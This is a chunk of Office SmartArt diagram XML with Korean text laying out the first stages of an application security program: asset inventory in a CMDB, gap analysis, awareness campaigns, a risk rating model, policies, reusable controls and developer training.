    <dgm:cxn modelId="{C57C95A1-A882-4687-8CCA-2B5084D36233}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BBDA16A6-048F-455C-967C-8C5432345150}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{34810BA8-ABE6-4135-9DA7-66092273C67F}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{2B332EAB-1224-4EC7-902F-FB64603358D2}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" srcOrd="2" destOrd="0" parTransId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" sibTransId="{E2D6A2A1-5438-4DC5-806B-70724658813A}"/>
    <dgm:cxn modelId="{69925AAC-5A0D-4953-8BED-24BB53BFA92D}" type="presOf" srcId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48311AAE-790D-405B-BEB3-7AB59042F49A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="4" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{95F828B1-2D90-4F9A-BEED-3DD9226215F8}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{726996B8-2BED-48B2-834D-8F75E886ECF6}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FEDCF5BB-E616-438D-A0A9-061B2131706E}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A95139C0-70D1-49DD-B4A0-0B2BCBE04542}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DE5646CC-F144-493B-9414-C6346E590FF4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}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E8E981D5-E6B1-461B-BFDF-A91A7C7F4A25}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" srcOrd="1" destOrd="0" parTransId="{4707E43C-0E63-42FE-96E7-6097CEC31A66}" sibTransId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}"/>
    <dgm:cxn modelId="{27E9E7E8-84BF-490C-8E55-886BEF8D51D8}" type="presOf" srcId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" srcOrd="0" destOrd="0" parTransId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" sibTransId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}"/>
    <dgm:cxn modelId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="2" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{F6F772F4-A1B6-4778-8746-D69333855C1E}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8B246AF8-C2C4-4561-A051-B3758C578118}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE21A6F9-9DA4-4853-A9BC-5ABFC76549D0}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E2F614FE-49E0-414C-9F19-C6BABCDA33DA}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{B8D773FF-1ABB-43FD-AE7D-638AD73ADB48}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4B36AE18-6088-4B56-BE8C-0D3C0CAFF428}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8DCF835A-332D-4698-8619-A5DB9CD2321B}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF997F2B-8A27-4733-A000-992DB905508A}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AA571062-B381-4FE4-964B-178B8FD3CB4C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DC365AF5-E47D-4A6A-9CB5-14A9E85F41BD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D02CD41D-5A18-4472-AF5B-E26C2CB35A44}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F90A638F-850C-4DD4-BEC9-DA94338232F6}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E13D59C1-F420-4F3C-9854-BC4278FC1C44}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ACE6659B-2530-463D-81A1-02AC11D4ED74}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{13513F9B-B952-419F-8669-8B9A7C676519}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7C38636C-D310-45BB-ACA1-58161EC4B5D5}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F2D496B0-F181-4461-B8B9-A5893FA171A8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2BB34E29-F7A9-4730-830C-57E8313A5775}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{155D53C0-4E99-47ED-A3FC-08A89A7713BD}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2FA686E4-69C9-4157-99BB-FC07ED348BD0}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{419CA331-C8EE-44AB-ADA5-AB486B0517BF}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BDB3145-0436-44E2-A024-4DCA139F796F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1E0B1994-3A43-446D-9155-199EE3952693}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A1F9558-9FB2-41D4-838A-BEFCB5840CBE}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4A9004C2-9556-4B5F-9F9F-AABF50393D9E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ABF97206-F55A-416B-AF28-6B2FDBDA637C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{106748C2-3A68-420D-8A0A-FDAD3245FA2B}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BB1961E0-5420-447B-9F97-85C197CC527B}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF62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4246484" y="-2174929"/>
          <a:ext cx="1027022" cy="5559552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모든 응용프로그램 및 관련 데이터 자산을 문서화하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>규모가 큰 조직은 이러한 목적으로 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>를 구현하는 것을 고려해야 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>애플리케이션 보안 프로그램</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 구축하고 채택하게 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>핵심 개선 영역과 실행 계획을 정의하기 위해 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>여러분의 조직과 유사기관과 비교하는 역량 갭 분석</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 수행하게 하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>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IT</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>조직 전반적 차원에서 관리자의 승인을 얻고 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>애플리케이션 보안 인식 캠페인</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 확립해야 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1980220" y="141470"/>
        <a:ext cx="5509417" cy="926752"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184" cy="11712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/>
            <a:t>시작하기</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="-961617"/>
          <a:ext cx="937021" cy="5559552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 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>비즈니스 관점에서 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>애플리케이션 포트폴리오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>의 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>보호 요구사항</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 파악하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US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 조직의 위험 허용 범위를 반영하는 일관된 가능성 및 영향 요인 집합을 사용하여 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>공통 위험 등급 모델</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 수립하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 결과적으로 모든 애플리케이션 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>API</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>를 측정하고 우선 순위를 지정하고 측정하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>. CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>에 결과를 추가하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>요구하는 엄격한 수준과 적용 범위를 제대로 정의하기 위한 보증 지침을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="1395390"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="1232520"/>
          <a:ext cx="938893" cy="11712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/>
            <a:t>위험기반 포트폴리오 접근법</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="268223"/>
          <a:ext cx="937021" cy="5559552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</a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>모든 개발팀들이 지킬 수 있는 애플리케이션 보안 베이스라인을 제공하는 일련의 집중된 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>정책과 기준</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea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>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>재사용 가능한 보안 통제의 공통 집합</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 정의하여 정책들과 기준들을 보완하고</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>사용할 때 필요한 설계 및 개발 지침을 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRP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>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t> 다양한 개발 역할과 주제들을 대상으로 필요한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>애플리케이션 보안 교육 커리큘럼</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="2625230"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2462361"/>
          <a:ext cx="938893" cy="11712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/>
            <a:t>기본이 강력해야 한다</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="1498065"/>
          <a:ext cx="937021" cy="5559552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기존 개발 및 운영 프로세스들에 안전한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
